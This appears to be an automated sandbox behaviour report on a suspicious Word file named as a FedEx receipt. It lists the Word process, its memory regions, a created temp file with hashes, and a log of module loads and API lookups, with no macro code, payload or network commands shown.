3692f99b76663e864b3fae22828ab01021dcc50c33f5ec041aa3b055478a4ab2 (SHA256)
receipt_FedEX_4028873.doc
Word Document
Created at 2018-12-06 22:25:00
Notifications (1/1)
The overall sleep time of all monitored processes was truncated from "45 seconds" to "30 seconds" to reveal dormant functionality.
Monitored Processes
Behavior Information - Sequential View
Process #1: winword.exe
480
0
| Information | Value |
|---|---|
| ID | #1 |
| File Name | c:\program files\microsoft office\root\office16\winword.exe |
| Command Line | "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n |
| Initial Working Directory | C:\Users\aETAdzjz\Desktop\ |
| Monitor | Start Time: 00:00:31, Reason: Analysis Target |
| Unmonitor | End Time: 00:03:42, Reason: Self Terminated |
| Monitor Duration | 00:03:11 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x8bc |
| Parent PID | 0x39c (c:\windows\explorer.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
934
0x
930
0x
92C
0x
928
0x
924
0x
920
0x
91C
0x
918
0x
914
0x
910
0x
90C
0x
908
0x
904
0x
900
0x
8FC
0x
8DC
0x
8D8
0x
8D4
0x
8D0
0x
8CC
0x
8C0
0x
990
0x
9D0
0x
B4C
0x
92C
0x
9B0
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000020000 | 0x00020000 | 0x00020fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00043fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000050000 | 0x00050000 | 0x00050fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000060000 | 0x00060000 | 0x00060fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000070000 | 0x00070000 | 0x00070fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000080000 | 0x00080000 | 0x00086fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000090000 | 0x00090000 | 0x0018ffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00190000 | 0x001f6fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000000200000 | 0x00200000 | 0x00201fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000210000 | 0x00210000 | 0x00210fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000220000 | 0x00220000 | 0x00220fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000230000 | 0x00230000 | 0x00231fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000240000 | 0x00240000 | 0x00241fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000250000 | 0x00250000 | 0x00252fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000260000 | 0x00260000 | 0x00261fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000270000 | 0x00270000 | 0x0027ffff | Private Memory | - |
|
|
|
- |
| private_0x0000000000280000 | 0x00280000 | 0x0028ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000290000 | 0x00290000 | 0x00292fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000002a0000 | 0x002a0000 | 0x0039ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000003a0000 | 0x003a0000 | 0x003a2fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000003b0000 | 0x003b0000 | 0x003b2fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000003c0000 | 0x003c0000 | 0x003c2fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000003d0000 | 0x003d0000 | 0x003d2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000003e0000 | 0x003e0000 | 0x0041ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000420000 | 0x00420000 | 0x00427fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000430000 | 0x00430000 | 0x00430fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000440000 | 0x00440000 | 0x0044ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000450000 | 0x00450000 | 0x0054ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000550000 | 0x00550000 | 0x006d7fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000006e0000 | 0x006e0000 | 0x00860fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000870000 | 0x00870000 | 0x01c6ffff | Pagefile Backed Memory | r |
|
|
|
- |
| sortdefault.nls | 0x01c70000 | 0x01f3efff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000001f40000 | 0x01f40000 | 0x02332fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000002340000 | 0x02340000 | 0x0243ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002440000 | 0x02440000 | 0x0263ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000002640000 | 0x02640000 | 0x0271efff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000002720000 | 0x02720000 | 0x02720fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002730000 | 0x02730000 | 0x02730fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002740000 | 0x02740000 | 0x02740fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002750000 | 0x02750000 | 0x02750fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000002760000 | 0x02760000 | 0x02760fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000002770000 | 0x02770000 | 0x027effff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000027f0000 | 0x027f0000 | 0x027f4fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000002800000 | 0x02800000 | 0x02800fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000002810000 | 0x02810000 | 0x0290ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002910000 | 0x02910000 | 0x02937fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002940000 | 0x02940000 | 0x029aafff | Private Memory | rw |
|
|
|
- |
| private_0x00000000029b0000 | 0x029b0000 | 0x02aaffff | Private Memory | rw |
|
|
|
- |
| kernelbase.dll.mui | 0x02ab0000 | 0x02b6ffff | Memory Mapped File | rw |
|
|
|
- |
| pagefile_0x0000000002b70000 | 0x02b70000 | 0x02b71fff | Pagefile Backed Memory | r |
|
|
|
- |
| index.dat | 0x02b80000 | 0x02b8bfff | Memory Mapped File | rw |
|
|
|
- |
| index.dat | 0x02b90000 | 0x02b97fff | Memory Mapped File | rw |
|
|
|
- |
| index.dat | 0x02ba0000 | 0x02baffff | Memory Mapped File | rw |
|
|
|
- |
| pagefile_0x0000000002bb0000 | 0x02bb0000 | 0x02bb0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000002bc0000 | 0x02bc0000 | 0x02bc0fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000002bd0000 | 0x02bd0000 | 0x02bd0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000002be0000 | 0x02be0000 | 0x02c5ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000002c60000 | 0x02c60000 | 0x02c60fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000002c70000 | 0x02c70000 | 0x02c70fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000002c80000 | 0x02c80000 | 0x02c81fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000002c90000 | 0x02c90000 | 0x02d8ffff | Private Memory | rw |
|
|
|
- |
| msxml6r.dll | 0x02d90000 | 0x02d90fff | Memory Mapped File | r |
|
|
|
- |
| {afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000017.db | 0x02da0000 | 0x02dbffff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000002dc0000 | 0x02dc0000 | 0x02dc0fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000002e00000 | 0x02e00000 | 0x02e0ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002e20000 | 0x02e20000 | 0x02f1ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002fc0000 | 0x02fc0000 | 0x030bffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003100000 | 0x03100000 | 0x031fffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000003200000 | 0x03200000 | 0x035fffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000003600000 | 0x03600000 | 0x036fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003700000 | 0x03700000 | 0x037fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003890000 | 0x03890000 | 0x0389ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000038c0000 | 0x038c0000 | 0x039bffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000039c0000 | 0x039c0000 | 0x03abffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003b40000 | 0x03b40000 | 0x03bbffff | Private Memory | rwx |
|
|
|
- |
| private_0x0000000003bc0000 | 0x03bc0000 | 0x03fbffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004000000 | 0x04000000 | 0x0407ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004080000 | 0x04080000 | 0x0417ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004180000 | 0x04180000 | 0x0427ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004280000 | 0x04280000 | 0x04a7ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000004a80000 | 0x04a80000 | 0x04dc2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004dd0000 | 0x04dd0000 | 0x04f01fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004fa0000 | 0x04fa0000 | 0x0501ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005020000 | 0x05020000 | 0x0502ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005070000 | 0x05070000 | 0x050effff | Private Memory | rw |
|
|
|
- |
| staticcache.dat | 0x050f0000 | 0x05a1ffff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000005a90000 | 0x05a90000 | 0x05b8ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005c00000 | 0x05c00000 | 0x05cfffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005d00000 | 0x05d00000 | 0x05d0ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005d50000 | 0x05d50000 | 0x05e4ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005ec0000 | 0x05ec0000 | 0x05ecffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005f20000 | 0x05f20000 | 0x0601ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000006020000 | 0x06020000 | 0x0611ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000006120000 | 0x06120000 | 0x0621ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000062d0000 | 0x062d0000 | 0x063cffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000006410000 | 0x06410000 | 0x0650ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000006550000 | 0x06550000 | 0x0664ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000006650000 | 0x06650000 | 0x06e4ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000006e50000 | 0x06e50000 | 0x06f4ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000006f50000 | 0x06f50000 | 0x07f4ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000007ff0000 | 0x07ff0000 | 0x0806ffff | Private Memory | rw |
|
|
|
- |
| ~df834800654bb3e1d0.tmp | 0x08070000 | 0x080effff | Memory Mapped File | rw |
|
|
|
|
| private_0x0000000008100000 | 0x08100000 | 0x0817ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000008180000 | 0x08180000 | 0x0857ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000037a30000 | 0x37a30000 | 0x37a3ffff | Private Memory | rwx |
|
|
|
- |
| private_0x0000000037c80000 | 0x37c80000 | 0x37c8ffff | Private Memory | rwx |
|
|
|
- |
| osppc.dll | 0x751b0000 | 0x751e2fff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x77a20000 | 0x77b19fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x77b20000 | 0x77c3efff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77c40000 | 0x77de8fff | Memory Mapped File | rwx |
|
|
|
- |
| psapi.dll | 0x77e00000 | 0x77e06fff | Memory Mapped File | rwx |
|
|
|
- |
| normaliz.dll | 0x77e10000 | 0x77e12fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| winword.exe | 0x13f550000 | 0x13f72bfff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x000007febdd50000 | 0x7febdd50000 | 0x7febdd5ffff | Private Memory | rwx |
|
|
|
- |
| private_0x000007febfb90000 | 0x7febfb90000 | 0x7febfb9ffff | Private Memory | rwx |
|
|
|
- |
| msptls.dll | 0x7fee5af0000 | 0x7fee5c63fff | Memory Mapped File | rwx |
|
|
|
- |
| adal.dll | 0x7fee5c70000 | 0x7fee5d89fff | Memory Mapped File | rwx |
|
|
|
- |
| riched20.dll | 0x7fee5d90000 | 0x7fee602afff | Memory Mapped File | rwx |
|
|
|
- |
| mscoreei.dll | 0x7fee61d0000 | 0x7fee6268fff | Memory Mapped File | rwx |
|
|
|
- |
| dwrite.dll | 0x7fee6270000 | 0x7fee63edfff | Memory Mapped File | rwx |
|
|
|
- |
| d3d10warp.dll | 0x7fee63f0000 | 0x7fee65bffff | Memory Mapped File | rwx |
|
|
|
- |
| msores.dll | 0x7fee65c0000 | 0x7feea9a6fff | Memory Mapped File | rwx |
|
|
|
- |
| mso99lres.dll | 0x7feea9b0000 | 0x7feeb6a4fff | Memory Mapped File | rwx |
|
|
|
- |
| mso40uires.dll | 0x7feeb6b0000 | 0x7feebaecfff | Memory Mapped File | rwx |
|
|
|
- |
| mso.dll | 0x7feebaf0000 | 0x7feed51bfff | Memory Mapped File | rwx |
|
|
|
- |
| mso98win32client.dll | 0x7feed520000 | 0x7feee1c6fff | Memory Mapped File | rwx |
|
|
|
- |
| mso40uiwin32client.dll | 0x7feee1d0000 | 0x7feeec9efff | Memory Mapped File | rwx |
|
|
|
- |
| mso30win32client.dll | 0x7feeeca0000 | 0x7feef383fff | Memory Mapped File | rwx |
|
|
|
- |
| mso20win32client.dll | 0x7feef390000 | 0x7feef832fff | Memory Mapped File | rwx |
|
|
|
- |
| oart.dll | 0x7feef840000 | 0x7fef07c4fff | Memory Mapped File | rwx |
|
|
|
- |
| wwlib.dll | 0x7fef07d0000 | 0x7fef2fa8fff | Memory Mapped File | rwx |
|
|
|
- |
| mscoree.dll | 0x7fef3020000 | 0x7fef308efff | Memory Mapped File | rwx |
|
|
|
- |
| mlang.dll | 0x7fef3170000 | 0x7fef31aafff | Memory Mapped File | rwx |
|
|
|
- |
| msointl.dll | 0x7fef31e0000 | 0x7fef337cfff | Memory Mapped File | rwx |
|
|
|
- |
| wwintl.dll | 0x7fef3380000 | 0x7fef343ffff | Memory Mapped File | rwx |
|
|
|
- |
| d2d1.dll | 0x7fef3440000 | 0x7fef3521fff | Memory Mapped File | rwx |
|
|
|
- |
| mso50win32client.dll | 0x7fef3530000 | 0x7fef35bafff | Memory Mapped File | rwx |
|
|
|
- |
| msvcp140.dll | 0x7fef35c0000 | 0x7fef365bfff | Memory Mapped File | rwx |
|
|
|
- |
| d3d11.dll | 0x7fef3660000 | 0x7fef3725fff | Memory Mapped File | rwx |
|
|
|
- |
| rasman.dll | 0x7fef4d40000 | 0x7fef4d5bfff | Memory Mapped File | rwx |
|
|
|
- |
| rasapi32.dll | 0x7fef4d60000 | 0x7fef4dc1fff | Memory Mapped File | rwx |
|
|
|
- |
| winspool.drv | 0x7fef54d0000 | 0x7fef5540fff | Memory Mapped File | rwx |
|
|
|
- |
| npmproxy.dll | 0x7fef59c0000 | 0x7fef59cbfff | Memory Mapped File | rwx |
|
|
|
- |
| netprofm.dll | 0x7fef5ff0000 | 0x7fef6063fff | Memory Mapped File | rwx |
|
|
|
- |
| msxml6.dll | 0x7fef6100000 | 0x7fef62f1fff | Memory Mapped File | rwx |
|
|
|
- |
| rtutils.dll | 0x7fef6570000 | 0x7fef6580fff | Memory Mapped File | rwx |
|
|
|
- |
|
For performance reasons, the remaining 266 entries are omitted.
The remaining entries can be found in flog.txt. |
||||||||
Created Files
| Filename | File Size | Hash Values | YARA Match | Actions |
|---|---|---|---|---|
| c:\users\aetadzjz\appdata\local\temp\~df834800654bb3e1d0.tmp | 0.50 KB |
MD5:
bf619eac0cdf3f68d496ea9344137e8b
SHA1: 5c3eb80066420002bc3dcc7ca4ab6efad7ed4ae5 SHA256: 076a27c79e5ace2a3d47f9dd2e83e4ff6ea8872b3c2218f66c92b89b55f36560 SSDeep: 3:: |
|
|
Threads
Thread 0x8c0
480
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| System | Get Time | type = System Time, time = 2018-12-06 22:26:31 (UTC) |
|
1 | |
| System | Get Time | type = Ticks, time = 100324 |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Module | Get Handle | module_name = c:\program files\microsoft office\root\office16\winword.exe, base_address = 0x13f550000 |
|
1 | |
| Module | Load | module_name = Comctl32.dll, base_address = 0x7fefc690000 |
|
1 | |
| Module | Get Handle | module_name = MSI.DLL, base_address = 0x7fefa750000 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = MsiProvideQualifiedComponentA, address_out = 0x7fefa7d3b3c |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = MsiGetProductCodeA, address_out = 0x7fefa7ca13c |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = MsiReinstallFeatureA, address_out = 0x7fefa7d1618 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = MsiProvideComponentA, address_out = 0x7fefa7cf088 |
|
1 | |
| Module | Get Handle | module_name = C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\VBEUI.DLL, base_address = 0x0 |
|
1 | |
| Module | Load | module_name = C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\VBEUI.DLL, base_address = 0x7fee3a50000 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = MsoVBADigSigCallDlg, address_out = 0x7fee3b572c0 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = MsoVbaInitSecurity, address_out = 0x7fee3ac60b0 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = MsoFIEPolicyAndVersion, address_out = 0x7fee3a71a60 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = MsoFAnsiCodePageSupportsLCID, address_out = 0x7fee3ac5f50 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = MsoFInitOffice, address_out = 0x7fee3a6f000 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = MsoUninitOffice, address_out = 0x7fee3a5e860 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = MsoFGetFontSettings, address_out = 0x7fee3a53fc0 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = MsoRgchToRgwch, address_out = 0x7fee3a62380 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = MsoHrSimpleQueryInterface, address_out = 0x7fee3a57b80 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = MsoHrSimpleQueryInterface2, address_out = 0x7fee3a57b20 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = MsoFCreateControl, address_out = 0x7fee3a58730 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = MsoFLongLoad, address_out = 0x7fee3b93260 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = MsoFLongSave, address_out = 0x7fee3b93280 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = MsoFGetTooltips, address_out = 0x7fee3a61f40 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = MsoFSetTooltips, address_out = 0x7fee3ac6370 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = MsoFLoadToolbarSet, address_out = 0x7fee3ab4590 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = MsoFCreateToolbarSet, address_out = 0x7fee3a555b0 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = MsoHpalOffice, address_out = 0x7fee3a60240 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = MsoFWndProcNeeded, address_out = 0x7fee3a53d10 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = MsoFWndProc, address_out = 0x7fee3a56d30 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = MsoFCreateITFCHwnd, address_out = 0x7fee3a53d40 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = MsoDestroyITFC, address_out = 0x7fee3a5e6f0 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = MsoFPitbsFromHwndAndMsg, address_out = 0x7fee3a5df40 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = MsoFGetComponentManager, address_out = 0x7fee3a57bf0 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = MsoMultiByteToWideChar, address_out = 0x7fee3a5fcd0 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = MsoWideCharToMultiByte, address_out = 0x7fee3a58b20 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = MsoHrRegisterAll, address_out = 0x7fee3b52ef0 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = MsoFSetComponentManager, address_out = 0x7fee3a642c0 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = MsoFCreateStdComponentManager, address_out = 0x7fee3a53e20 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = MsoFHandledMessageNeeded, address_out = 0x7fee3a5ab10 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = MsoPeekMessage, address_out = 0x7fee3a5a7d0 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = MsoFCreateIPref, address_out = 0x7fee3a51550 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = MsoDestroyIPref, address_out = 0x7fee3a5e830 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = MsoChsFromLid, address_out = 0x7fee3a513d0 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = MsoCpgFromChs, address_out = 0x7fee3a56660 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = MsoSetLocale, address_out = 0x7fee3a51500 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = MsoFSetHMsoinstOfSdm, address_out = 0x7fee3a53dd0 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = MsoSetVbaInterfaces, address_out = 0x7fee3b571e0 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = MsoGetControlInstanceId, address_out = 0x7fee3b26d10 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VbeuiFIsEdpEnabled, address_out = 0x7fee3b998e0 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VbeuiEnterpriseProtect, address_out = 0x7fee3b99830 |
|
1 | |
| Environment | Get Environment String | name = DDRYBUR |
|
1 | |
| Module | Get Filename | process_name = c:\program files\microsoft office\root\office16\winword.exe, file_name_orig = C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\VBE7.DLL, size = 260 |
|
1 | |
| Module | Load | module_name = C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\1033\VBE7INTL.DLL, base_address = 0x7fef92d0000 |
|
1 | |
| Module | Get Filename | process_name = c:\program files\microsoft office\root\office16\winword.exe, file_name_orig = C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\VBE7.DLL, size = 260 |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\Licenses |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CLASSES_ROOT\Licenses\8804558B-B773-11d1-BC3E-0000F87552E7, data = } |
|
1 | |
| Module | Load | module_name = OLEAUT32.DLL, base_address = 0x7feffd80000 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = SysFreeString, address_out = 0x7feffd81320 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = LoadTypeLib, address_out = 0x7feffd8f1e0 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = RegisterTypeLib, address_out = 0x7feffddcaa0 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = QueryPathOfRegTypeLib, address_out = 0x7feffe11760 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = UnRegisterTypeLib, address_out = 0x7feffe120d0 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = OleTranslateColor, address_out = 0x7feffdac760 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = OleCreateFontIndirect, address_out = 0x7feffddecd0 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = OleCreatePictureIndirect, address_out = 0x7feffdde840 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = OleLoadPicture, address_out = 0x7feffdef420 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = OleCreatePropertyFrameIndirect, address_out = 0x7feffde4ec0 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = OleCreatePropertyFrame, address_out = 0x7feffde9350 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = OleIconToCursor, address_out = 0x7feffdb6e40 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = LoadTypeLibEx, address_out = 0x7feffd8a550 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = OleLoadPictureEx, address_out = 0x7feffdef320 |
|
1 | |
| Window | Create | class_name = ThunderMain, wndproc_parameter = 0 |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Module | Get Handle | module_name = c:\windows\system32\user32.dll, base_address = 0x77a20000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\user32.dll, function = GetSystemMetrics, address_out = 0x77a394f0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\user32.dll, function = MonitorFromWindow, address_out = 0x77a35f08 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\user32.dll, function = MonitorFromRect, address_out = 0x77a32b00 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\user32.dll, function = MonitorFromPoint, address_out = 0x77a2ab64 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\user32.dll, function = EnumDisplayMonitors, address_out = 0x77a35c30 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\user32.dll, function = GetMonitorInfoA, address_out = 0x77a2a730 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\user32.dll, function = EnumDisplayDevicesA, address_out = 0x77a2a5b4 |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Module | Get Handle | module_name = oleaut32.dll, base_address = 0x7feffd80000 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = DispCallFunc, address_out = 0x7feffd82270 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = LoadTypeLibEx, address_out = 0x7feffd8a550 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = UnRegisterTypeLib, address_out = 0x7feffe120d0 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = CreateTypeLib2, address_out = 0x7feffe0dbd0 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarDateFromUdate, address_out = 0x7feffd85c90 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarUdateFromDate, address_out = 0x7feffd86330 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = GetAltMonthNames, address_out = 0x7feffda66c0 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarNumFromParseNum, address_out = 0x7feffd84710 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarParseNumFromStr, address_out = 0x7feffd848f0 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarDecFromR4, address_out = 0x7feffdbb640 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarDecFromR8, address_out = 0x7feffdbb360 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarDecFromDate, address_out = 0x7feffdc2640 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarDecFromI4, address_out = 0x7feffda58a0 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarDecFromCy, address_out = 0x7feffda5820 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VarR4FromDec, address_out = 0x7feffdbaf20 |
|
1 | |
